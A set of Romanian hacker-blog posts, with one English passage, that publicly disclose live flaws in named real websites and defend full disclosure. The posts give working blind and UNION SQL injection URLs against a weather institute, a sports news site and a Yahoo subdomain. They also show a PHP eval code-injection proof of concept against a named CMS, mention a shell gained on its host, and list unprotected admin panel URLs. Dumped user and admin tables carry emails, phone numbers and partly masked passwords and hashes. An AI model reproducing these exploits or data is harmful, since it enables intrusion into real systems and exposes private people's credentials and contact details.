“VREMEA in DIRECT pe calculatorul tau !” Hihi… site-ul fiind vulnerabil la blind sql injection, se pare ca nu doar vremea ci si niste date mai personale (de logare etc) pot fi aduse direct pe calculatorul nostru. Site-ul care apartine Administratiei Nationale de Meteorologie si Hidrologie (INMH) este un punct de referinta pentru multi, incepand de la presa, tv pana la persoanele fizice, interesate de vreme. Ma amuz la gandul ce ar fi ca intr-o zi, in plina iarna, datorita insecuritatii site-ului, pe harta din prima pagina sa apara temperaturi de peste +40 grade. Pentru autenticitate publicam niste tabele.

Baza de date ftp, tabelul users
+———————————————————- +———————————————-
| description | homedir | passwd | userid |
+———————————————————– +————————————+———
| Cont ftp pentru upload fluxuri | /var/www/html/inmh/txt | $1$blacOe0o$tOXXXXXXXIoGe8uhrOs.91 | caraman |
| Sorinela | /var/www/html/inmh/images | cXXXXr | ftpinmh |
| Cont ftp pentru upload poluare | /var/www/html/inmh/txt | $1$blacOe0o$4iXXXXXu7gjrUBPeMvr.o. | sandu |
+————————————————————+————————————+———-

Baza de date inmh cu 73 tabele
+—————————-+
| abs_model_prognoza |
| abs_produse |
| abs_prognoza |
| abs_tipuri_prognoza |
| abs_zone |
| avertizari_en |
| avertizari_en_bak |
| avertizari_nowcasting_ro |
| avertizari_ro |
| avertizari_symbols |
| avertizari_symbols_rel |
| banner |
| c_descriere_tabele |
| c_evid_date |
| c_evid_statii |
| c_parametri |
| content_en |
| content_en_bak |
| content_ro |
| content_ro_bak |
| date_brute |
| date_brute_20071005 |
| date_brute_test2 |
| didi |
| emails_comanda |
| europa |
| faq_en |
| faq_ro |
| fenomen |
| forums |
| forums_auth |
| forums_forum2group |
| forums_groups |
| forums_moderators |
| forums_user2group |
| glosar_en |
| glosar_ro |
| guestbook |
| iconite_fenomene |
| lucrari_publicate |
| modules |
| news |
| orase |
| p2c |
| p2l |
| pages |
| pages_en |
| pages_ro |
| phonebook |
| prima |
| proces_principal |
| prognoza |
| prognoza_fenomene_speciale |
| prognoza_nebulozitate |
| prognoza_orase |
| prognoza_precipitatii |
| prognoza_presiune |
| prognoza_procese |
| prognoza_vant |
| prognoza_zone_geografice |
| sessions |
| sinoptice |
| statii |
| statii_razvan |
| statistici |
| stiri_en |
| stiri_ro |
| symbols |
| t1 |
| t1_attachments |
| t1_bodies |
| termeni |
| users |
+—————————-+

Cat si primele conturi,din baza de date imnh, tabelul users, cu datele de logare (unele caractere au fost inlocuite intentionat cu X)
+————————–+————+———————————-+——————+————–+————-+
| email | nume | pass | prenume | tel | user |
+————————–+————+———————————-+——————+————–+————-+
| NULL | Guest user | NULL | NULL | NULL | cretzu03 |
| 13.butty@gmail.com | astral | ce9a81c1adf725c43XXXXXee26e431b7 | adita | NULL | !N I C K! |
| a.rosca@gardiner.ro | anm | 68112abab86c73e20XXXXX52536feb54 | anm | +4072XXX2801 | 0Cool |
| a.stanescu@swietelsky.ro | Mediplus | 0ec9215bf72bd1d9eXXXXXb0a9945a26 | Dragomir Liviu | +4072XXX6665 | 13 |
| a@a.com | ANM | XXXX | Caraman | +4072XXX2800 | 1961 |
| a@a.ro | unify | 6074c6aa3488f3c2dXXXXXa7ca821aab | pocora sebastian | +40722XXX153 | 200100 |
| aaaa@meteo.inmh.ro | ANM | 57ca32d682e919cb0XXXXX35fc2e7d13 | Meteorolog | +4072XXX4447 | 28daniela28 |
| aadrf@k.ro | ANM | 25ff43ff0e4a2bfe4XXXXXf2793773c2 | Elena Toma | +4072XXX2816 | 2des |
| aanciu@yahoo.com | ANM | 19180972faf9e2696XXXXX8816315a0d | Ralita | NULL | 3E_Belgium |
| aavadim@yahoo.com | ASTRAL | cabdb1014252d39acXXXXX47e7d5fbc2 | daniel dragomir | +407XXX46542 | 68adi |
+————————–+————+———————————-+——————+————–+————-+

Am apărut, am anunţat, am arătat, am dovedit, am ajutat. Acum domnii care nu înţeleg scopul acestui blog trebuie să citească şi să bage la cap. Din fericire pentru viitorul contentului nostru şi din păcate pentru vizitatorii de rând, ştiu că celor cărora li se adresează articolul le va intra totul pe o ureche si le va ieşi pe cealaltă.

De câţiva ani pe internet se practică metoda full-disclosure. Capetele mici din România ce afirmă că acest lucru face parte din metodele blackhat şi este ilegal trebuie să priceapă că este o tactică folosită chiar şi de expertii în securitate recunoscuţi pe plan mondial. Buuun. Să explic unde începe şi unde se termină etica?

1. Se găseşte problema – etic

2. Se anunţă problema la vendor – etic

3. Se aşteaptă câteva zile pentru a se rezolva problema – etic

4. Se face full disclosure imediat după raportarea vulnerabilităţii către vendor – tot etic

5. Se face full disclosure fără a se anunţa problema la vendor – etic, dar preferăm să nu folosim această metodă. Au fost excepţii pe care dorim să le catalogăm drept greşeli şi ne cerem scuze pentru asta.

6. Se provoacă daune “fizice” serviciului afectat – nu-i etic

7.  Se vând, dau, folosesc informaţii confidenţiale din serviciul afectat – nu-i etic

Câţi dintre cei care şi-au regăsit site-urile aici au avut parte de un tratament ce le-a afectat bunul mers al site-ului? A facut cineva deface? A şters unul dintre noi ceva de pe server? Şi-a regăsit cineva aici bazele de date sau cms-urile? Raspunsul este NU.

Acum trecem la partea de comentarii “drăgăstoase” la adresa noastră.

Vine Gică Pardalian de pe hackersblog.org şi îţi găseşte o dudă în site-ul tău de ‘nşpe mii de euroi. Tu ca mare patron ce eşti sau poate developer ce a comis-o grav îţi simţi orgoliul călcat în picioare şi începi să te dai mare cu toate cunoştinţele tale excepţionale. Arunci cu vorbe şi injurii în cel care a avut etică şi bunul simţ de a te anunţa ca ai belele. Buuun. Ce crezi că rezolvi? Crezi că aici se organizează un concurs de popularitate cumva? Crezi că dacă încerci să dovedeşti că eşti mai bun va face greşeala să dispară? Tu eşti cel care a comis-o şi ai pus integritatea vizitatorilor în pericol iar noi am tras un semnal de alarmă asupra acestui fapt. Deci ai o bilă neagră pentru scripturile de cacao pe care le-ai pus pe site şi încă o bilă neagră pentru că te ţigăneşti pe greşeala ta. Cine este mai bun chiar nu contează pentru utilizatorii afectaţi iar pe noi ne doare fix în pix de cârcoteala ieftină ce apare din când în când în comentariile unora cu orgoliul lezat.

O altă categorie pe care am întâlnit-o este cea a “cunoscătorilor”. Ei vin şi se bat cu pumnii în piept că ştiu mai multe decât noi. Aşa şi? Nu-ţi place cum procedăm? Fă-o tu mai bine. Nu îţi place că existăm? Cui crezi că îi pasă? Nu am zis niciodată că suntem cei mai buni dar categoria ”cunoscătorilor” încearcă să ne pună vorbele lor în gură. Se aplică şi în cazul lor, desigur, durerea noastră fix în pix.

Am făcut cu toţii o greşeală majoră pe care o să o evităm de azi înainte. Nu vom mai raspunde în doi peri injuriilor şi apropourilor ieftine venite din partea diferitelor persoane prea frustrate. Nu e profesionist şi noi chiar vrem sa fim mai profesionişti decât cei care găsesc aici un mod de a-şi refula frustrarea celui ce acordă un serviciu de doi lei făcut praf din 2 comenzi date prin intermediul browserului. De azi înainte vom da ban direct oricărei persoane doritoare de scandal sau care s-a trezit peste noapte cu gândul că falsificăm pozele. Stau şi mă crucesc când văd atâţia incompetenţi ce fac afirmaţii fară să aibă idee măcar ce e calc.exe.

Suntem la sfârşitul anului 2008. Treziţi-vă la realitate şi începeţi să mai aflaţi şi voi cu ce se mănâncă etica în securitatea IT. Noi suntem 2.0 dar voi aţi rămas comuniştii ce cred că prin ameninţări şi mahalagisme pot închide gura celor care îi arată pe bună dreptate cu degetul.

Nu aşteptăm mulţumiri, nu cerem să ne răspundeţi la mailuri sau la articole, nu am cerut şi nu vom cere vreodată foloase materiale din partea nimănui. Deci care este problema voastră? E greu să rezolvaţi problemele şi să îi mulţumiţi lui D-zeu că bazele voastre de date şi scripturile nu au ajuns pe site-urile de warez?

Site-uri unde se face full disclosure:

http://www.securityfocus.com

http://xssed.com

http://sla.ckers.org

http://ha.ckers.org

http://milw0rm.com

http://web.nvd.nist.gov (ca să vezi)

Şi multe altele căutând pe Google

Aşa că acest lung articol se va termina cu mesajul:

Nu plecăm nicăieri. Rămânem în continuare aici pentru a le arăta oamenilor că siguranţa datelor lor personale depinde de multe ori de cei ai căror useri sunt. Dacă nu mai suntem noi ne va lua cineva locul cu siguranţă pentru că internetul reprezintă o formă a democraţiei si a cuvântului liber. A încerca să restricţionaţi astfel de informaţii vă vor aduce o reputaţie şi mai proastă în lumea REALĂ a internetului.

Consideraţi că aţi primit o lecţie de etică pe internet.

Da, din nou. Pana sa creada cineva ca avem vreo socoteala cu price.ro, va zic eu pe cuvant: N-AVEM. Dar nici amenintarile nu ne plac. Noi, editorii hackersblog, dupa ce aflam de vreo vulnerabilitate, bresa de siguranta a unui site, server, inainte sa publicam articolul, anuntam administratorii respectivi. Unii ne multumesc, altii nu. Sincer, nu asteptam coronitze, flori, nici macar o bere. In schimb dezaprobam total demonstrarea inutila de fortza, indreptata impotriva noastra.

Nu doresc sa fac reclama altui blog, dar merita de citit cum au reactionat data trecuta cei de la price.ro
http://blog.selrys.ro/blog/index.php/all?s=price.ro.

Continuarea e si mai interesanta.
” Buna ziua, In ultimul timp site-ul nostru a fost supus unui atac informatic. Am luat deja toate masurile pentru a nu mai permite asemenea atacuri. De asemenea, pentru a inlatura orice alte riscuri, am decis schimbarea parolei dumneavoastra cu o noua parola”…. blabla. Citez din mailul price.ro trimis userilor dupa cele intamplate. Un mail, cu un text nesimtit – parerea mea. In loc sa recunoasca ca au avut grave probleme de securitate, din cauza proastei programari, a sanitizarii unui parametru – ce sa zicem, ca se poate intampla oricui, numai cine nu munceste, nu greseste- ei merg pe varianta unui atac informatic. ATAC= 1.Ofensiva a unor forte… care urmaresc nimicirea sau prinderea inamicului si distrugerea unor obiective ale acestuia; 2. Agresiune împotriva unei persoane, unui stat etc – definitia atacului, din Dex .

Dragi domni si tovarasi de la price.ro, daca cel care a descoperit vulnerabilitatea chiar vroia sa lanseze un atac informatic, abuza de functii ca insert, drop, delete, adica mai pe romaneste insera, stergea, modifica datele din acea baza de date. Dar el nu a facut decat sa semnaleze bresa de sigurantza din sistemul vostru. Cat despre masurile, eforturile luate de Dvs. , de a nu mai permite oricui sa acceseze din exterior datele personale ale userilor, nu comentez.

Pozele vorbesc de la sine. Eu las pe altii sa traga concluziile.
Denumirea bazelor de date:

Datele personale, a celor inregistrati: nume, prenume, cnp, serie buletin, nr. buletin, numar telefon, numar tel. mobil, adresa, oras, username si parola. Macar acum parolele sunt criptate …bravos. In schimb, dupa cum se vede, o singura interogare afiseaza pana in cateva mii de rezultate.

REMOVED la cerere. Poza cu datele userilor a fost stearsa.

Doar parolele adminilor au ramas in text clar:

Nu credeam ca o sa mai gasesc asa ceva in scripturile “moderne” (desi recunosc ca imi doream asta), dar se pare ca m-am inselat. Cum ziceam, am gasit o vulnerabilitate foarte grava intr-un CMS care pare sa fie facut de cei de la softhost.ro , CMS folosit de multe site-uri (pe care, evident, tot ei le-au facut)
(“softhost.ro este o companie romaneasca ce dezvolta aplicatii software web-based si care ofera solutii de gazduire profesionale.”)

Cateva site-uri care folosesc in momentul de fata CMS-ul vulnerabil:

http://www.avocatnet.ro/

http://www.taxeimpozite.ro/

http://www.legalromania.com/

http://www.contractdemunca.ro/

http://www.infosrl.ro/

http://www.modeldecontract.ro/

http://www.lifeforlife.ro/

In ce consta vulnerabilitatea mai exact? Se poate executa cod PHP arbitrar. Proof of concept:
La accesarea link-ului: http://www.infosrl.ro/societate-comerciala/articol/id_71 totul e ok, se deschide articolul cu ID-ul 71:

La http://www.infosrl.ro/societate-comerciala/articol/id_71' deja apar php errors de prin softHostWS.php, zicand ceva de eval(). … hm… ceva nu e in ordine … CHIAR E EVAL(ceva . USER INPUT . altceva)?! Din pacate, da.

Sa vedem, reusim sa bagam o bucata de cod PHP incat sa formam un request valid? Sa incercam sa deschidem articolul cu ID-ul 713:
http://www.infosrl.ro/societate-comerciala/articol/id_71'.chr(51).'
chr(51) returneaza caracterul 3, concatenat cu restul string-ului formeaza 713, iar articolul rezultat e chiar articolul 713.

( se vede clar ca amandoua link-uri duc la acelasi articol => q.e.d. )

Sa vedem putin cum arata si softHostWS.php:

Da, chiar era eval(blabla). Si da, asta e phpshell pe hostul site-ului vulnerabil, obtinut, evident, dupa descoperirea&exploatarea vulnerabilitatii.

Avem adresa http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134&ajax=1 . Testam daca parametrul camp_id este vulnerabil la blind sql inection, sau nu. Testul, cum orice in viatza se bazeaza pe conceptul adevar si fals. In cazul nostru, sa vedem ce “raspunde” serverul la un adevar evindent (and 1=1)
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+1=1&ajax=1 Raspunsul este “adevarat” , adica se incarca pagina originala. Acum “intrebam” ceva fals (and 1=2)
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+1=2&ajax=1 Raspunsul este “fals”, nu se mai incarca pagina originala, deci serverul este “vorbaretz” si vulnerabil la blind sql injection.
Acum sa aflam versiunea mysql. http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+substring(@@version,1,1)=4&ajax=1
e fals, deci nu e mysql 4.Incercam 5 :
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+substring(@@version,1,1)=5&ajax=1
True, deci este mysql 5. Pentru a putea extrage date cel mai important este ca functia SELECT sa lucreze.Testam:
http://www.gsp.ro/index.php?section=ajax&screen=live_etapa&camp_id=134+and+(select+1)=1&ajax=1 .Select-ul lucreaza.
(in curand urmeaza partea 2-a tutorialului, pe alt site …sau tot pe gsp ? –alt parametru vulnerabil— cine stie)
Pana atunci va prezint o parte din datele extrase:
Database: gsp_cms
| adm_actions
| adm_module
| adm_perm
| adm_role
| adm_users
| agenda
| articole
| articole_atasate
| articole_autori
| articole_linkuri
| articole_propune_banner
| articole_voturi
| autori
| banner
| bursa_echipe
| bursa_items
| casete
| casete_engine
| casete_layout_zone
| casete_zone
| categorii
| comentarii
| comentarii_per_articole
| comp_campionat
| comp_campionat_echipa
| comp_echipe
| comp_etape
| comp_evenimente
| comp_jucatori
| comp_meciuri
| comp_meciuri_jucatori
| comp_sezoane
| comp_sport
| comp_transferuri
| concurs_dvd
| concurs_epson
| concurs_fault
| concurs_ing_intrebari
| concurs_ing_jucatori
| concurs_usb
| container
| countries
| download
| echipe_atasate
| editii
| emoteicons
| euro2008_flash
| forum_bann
| forum_words
| homepage
| horoscop
| horoscop_sportivi
| horoscop_zodii
| imagini
| imagini_newsletter
| integers
| jo_xml
| log_meciuri_sms
| log_search
| log_search_no_duplicates
| newsletter
| newsletter_add
| newsletter_pozitii
| newsletter_v2
| old_tipuri_eveniment
| poll
| rss
| rss_categories
| rss_images
| rss_rezultat
| seo_info
| seo_keywords
| seo_links
| stiri_meci
| t
| tag_obiecte
| tag_obiecte_old
| tag_words
| test_articole
| test_utf
| tipuri_eveniment
| top_search
| valute
| vars
| voturi

Tabelul: adm_users (cu numele si parolele adminilor – cum altfel decat in text clar)

+——-+———————————————-+———+————+—-+——-+——————–
| admin | allowed_ip | blogger | data | id | mesaj | name | nume_forum | online | pass |
+——-+———————————————-+———+————+—-+——-+——————–
| 0 | 82.76.228.64;85.186.228.232;*.*.*.*;…;… | 0 | 1130779905 | 3 | NULL | adi.nitulescu | cataa | 1 | gsXXXX |
| 0 | 82.76.228.64;82.76.41.225;85.186.228.232;… | 0 | NULL | 4 | NULL | alexandru.carstea | razvan | 0 | /runXXX/ |
| 0 | 82.76.228.64;85.186.228.232;192.168.0.12 | 0 | NULL | 24 | NULL | alexandru.ghiurcau | iulian | 0 | comXXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 48 | NULL | alina.mihaela | tudor | 0 | tigXXXX |
| 0 | *.*.*.*; …;…;…;… | 0 | NULL | 49 | NULL | andreea.moldoveanu | cms_test | 0 | paXXXX |
| 0 | *.*.*.*;…;… | 0 | NULL | 50 | NULL | andrei.craitoiu | cms_simple | 0 | paXXXX |
| 0 | *.*.*.* | 0 | NULL | 52 | NULL | anne.barbu | cji | 0 | cjXXX |
| 0 | *.*.*.*;… | 0 | NULL | 53 | NULL | antonio.robitu | sorin | 0 | admiXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 54 | NULL | beatrice |
masi | 0 | @maXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 55 | NULL | bogdan.luca | Cristi Roman | 0 | papaXXXX |
| 0 | *.*.*.*;… | 0 | NULL | 58 | NULL | cata | stefan horobet | 0 | ursXXXX |
| 0 | *.*.*.* | 0 | NULL | 59 | NULL | cji | marius comper | 0 | haiXXXX |

Disclaimer: In aceasta actiune nu a fost ranit niciun animal. Am folosit doar google. ORICINE poate accesa aceste pagini chiar si accidental. Ce ar putea sa faca dupa aceea depinde de la om la om.

http://www.velis.ro/admin/index.html?action=add_proiect

http://www.dantexsa.ro/admin/edit-dantele.php?id_dantela=4

http://www.drajna.ro/admin/edit.php

http://www.media-graphics.ro/work/Ant/eclipse/admin/index.php?m=adauga-modifica-categoriiLucrari

http://www.prodesigns.ro/admin/administrare.php?lang=pagini&categorie=0&nume=Despre%20noi

http://www.1web.ro/top/admin/

Cum s-a ajuns aici? epic @hackpedia.info se foloseste de vulnerabilitati de alta natura, ingineria sociala si proasta administrare a parolelor pentru ca acestea nu ar trebui stocate in locuri externe, personalul ar trebui sa fie instruit, etc.

“Creeaza-ti cont pe gsptv.ro si vei obtine un IDunic prin intermediul caruia te poti autentifica pe toate siteurile din reteaua GSP!” scrie pe site… Continuarea ar putea suna astfel: si toti vor rade de tine, cum datele tale personale, de logare, inclusiv de epayment vor ajunge pe mana oricui. Dovada stau imaginile de mai jos.

O companie care valoreaza miliarde de dolari si care se presupune ca ar trebui sa aibe doar programatori “buni”, programatori care nu lasa in urma lor gauri de securitate prin site-ul Yahoo!.
De XSS-uri se stie deja ca au fost destul de multe prin *.yahoo.com si totodata ca mai sunt si altele inca. Insa cand vine vorba de SQL Injection in yahoo.com, de privacy-ul promis de Yahoo! care pare sa se clatine, de posibilitatea de a avea acces la informatii private ale milioanelor de useri ai site-ului yahoo.com, gluma se ingroasa.

Sa continuam cu prezentarea vulnerabilitatii (gasita de Kenpachi si kw[3]rln @ hackersblog.org & rstcenter.com).
Una din paginile vulnerabile la SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18
Ce se vede aici? Informatii despre versiunea serverului SQL si userul curent de pe care se executa query-urile:

Listarea userelor SQL si parolele acestora:

Si, evident, multe altele.

Totodata, acest SQL Injection se poate folosi si pe post de XSS, folosit in special pentru furtul de sesiuni

Partea proasta e ca inca nu au adoptat o politica de recunoastere a bugurilor/vulnerabilitatilor din site-urile lor si a celor care le gasesc. Sa renunte la orgoliu si vor avea doar de castigat, majoritatea persoanelor care gasesc buguri in site-ul yahoo nu le mai dezvaluie tocmai din cauza asta. Totodata asta ar duce si la mai putine situatii neplacute gen conturi sparte / furate

===========================================================

English version:

A company worth billions of dollars which is supposed to have the best programmers, the kind of company that won’t leave any security wholes in the system. Yahoo! system that is!
XSS bugs are already yesterday’s news when we talk about Yahoo! They are all over the place on the *.yahoo.com subdomains.
But we are not talking here about minor XSS bugs. We mean serious business. We are talking about the kind of security which exposes the privacy of millions of users of the “trustable” Yahoo! services.
We are talking about SQL Injection. One of the worst kinds of security breach.

We will present here the vulnerability found by Kenpachi and kw[3]rln @ hackersblog.org & rstcenter.com .

Here you have one of the pages vulnerable to SQL Injection: http://in.jagran.yahoo.com/article/index.php?choice=homepage_getnews&state=1&city=87%20union%20all%20select%201,concat_ws(0x203a20,version(),user()),3,4,
5,6,7,8,9,10,11,12,13,14,15,16,17,18
What do we find here? Information about the SQL server, its version and the current user SQL user:

A list with SQL users and passwords:

And of course, much more information available at the hand of an attacker.

Moreover, this SQL Injection can be used as an XSS, especially for session hijacking:

The sad part is that Yahoo! didn’t adopt any policy whatsoever regarding this kind of problems. They dont admit they have a problem, nor do they give any credits to those who find them.

Following in the footsteps of other sites, Yahoo! could learn to gain from this. Vast majority of those who find bugs don’t disclose them anymore precisely for the fact that Yahoo! is in total denial. By coming out clean, Yahoo! would also reduce the amount of hacked/stolen accounts and other shameful security breaches like the one we present here.

De azi avem editori noi in cadrul blogului, Kenpachi si kw[3]rln @ rstcenter.com, de unu probabil stiti deja.